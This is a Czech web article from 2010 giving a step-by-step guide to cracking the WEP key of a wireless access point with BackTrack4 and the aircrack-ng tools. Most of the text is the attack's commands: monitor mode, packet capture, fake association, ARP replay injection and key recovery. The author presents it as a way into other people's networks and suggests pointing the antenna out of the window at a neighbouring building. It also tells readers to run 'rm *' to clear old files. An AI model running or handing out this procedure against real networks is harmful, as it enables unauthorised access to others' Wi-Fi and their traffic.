Zpět na seznam článků     Číst komentáře (28)     Verze pro tisk

Prolomeni WEP klice AccessPointu

Autor: Fucky   
13.2.2010

Navod, jak prolomit WEP klic AccessPointu krok za krokem


Vsichni urcite vi, ze ke kazdemu AccessPointu je moznost pristupu pod heslem. Vsichni urcite tusi, ze tyto hesla/klice se daji prolomit. Malo kdo vi, jak.



V nasledujicich radcich popisu postup, krok za krokem, jak prolomit WEP klic AccessPointu krok za krokem.

K celemu postupu budeme potrebovat jen BackTrack4 a plne podporovanou wifi kartu v BackTrack4 (plna podpora driveru).



Postup:

1) Stahnout BackTrack4 z odkazu
http://ftp.uio.no/linux/backtrack/bt4-final.iso

2) Vypalit tento obraz na DVD

3) Restartovat PC, pripojit wifi kartu a z tohoto vypaleneho disku nabootovat PC


Po nabootovani spustime terminal a napiseme prikaz

"ifconfig wlan0 up".

Tim zapneme nasi wifi kartu (budeme predpokladat, ze je v systemu oznacena pod nazvem wlan0).

Zapneme monitorujici mod prikazem

"airmon-ng start wlan0".

Budeme predpokladat, ze monitorujici mod budeme mit pod oznacenim mon0. Dale pak oskenujeme okoli, ktere AccessPointy mame v dosahu s WEP klicem, prikazem

"airodump-ng --encrypt WEP mon0".

Po nalezeni nami hledaneho AccessPointu stiskneme CTRL+C pro ukonceni beziciho programu. Pak zkopirujeme do schranky BSSID daneho AccessPointu. Pak budeme ukladat veskerou komunikaci s timto AccessPointem pomoci prikazu

"airodump-ng --bssid VLOZIME --channel ZADAME --write AP mon0".

Za VLOZIME zadame BSSID daneho AccessPointu pomoci copy-paste metody. Za ZADAME napiseme cislo kanalu, na kterem AccessPoint vysila. Ten zjistime ze sloupce CH. Celou komunikaci budeme ukladat do souboru, jehoz nazev napiseme za prepinac --write. Tento nazev je z pravidla stejny, jako nazev daneho AccessPointu.

Otevreme druhy terminal a napiseme prikaz

"aireplay-ng -1 0 -a VLOZIME mon0".

Za VLOZIME zadame BSSID daneho AccessPointu pomoci copy-paste metody, stejne jako tomu bylo v predchozim odstavci. Pokud se nam zobrazi hlaska Association successful :-) , podarilo se nam uspesne prihlasit nasi wifi kartu k danemu AccessPointu.

Dale potrebujeme nasbirat data, ze kterych zjistime WEP klic. Toho docilime prikazem

"aireplay-ng -3 -b VLOZIME mon0".

Za vlozime opet vlozime BSSID AccessPointu.

Pak pockame, dokud se nam v prvnim terminalu zacnou nacitat data ve sloupci #Data, az do hodnoty 8000. Pak otevreme treti terminal a napiseme prikaz

"aircrack-ng AP.cap".

Za AP dosadime nazev souboru, ktery jsme napsali za prepinac --write a dopiseme za nej priponu .cap . Pak pockame, zda-li jsme byli uspesni. Pokud ano, zobrazi se nami hledany WEP klic. Pokud ne, napise se nam hlaska, at pokus opakujeme s 10000 IVs (data). Cely postup pak opakujeme, dokud se nam WEP klic nezobrazi. Vetsinou nam staci 8000 - 30000 dat.




Par rad na zaver:

1) Pokud budete chtit najednou zjistit vice WEP klicu k nekolika AccessPointum, vzdy za --write davejte jiny nazev, nejlepe nazev daneho AccessPointu

2) Pokud se cokoliv nepodari a budete muset znovu psat airodump-ng s prepinacem --write pro stejny AccessPoint, pouzijte predtim prikaz "rm *", tim smazete veskere predtim vytvorene soubory

3) Vsechny prikazy piste bez uvozovek

4) Pokud zkousime nejaky AccessPoint, ktery neni ve stejne mistnosti, ale je treba v jinem baraku, je lepsi wifi antenu vystrcit z okna


Video manual, na kterem je vse detailne popsano k tomuto clanku naleznete na Youtube.com na nize uvedenem linku



http://www.youtube.com/watch?v=mNmKWJcaV_M


P.S.: Pro informace ohledne pouzite wifi karty, mi napiste na fucky@email.cz

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 1/2

1  2  3  4  5    
(známkování jako ve škole)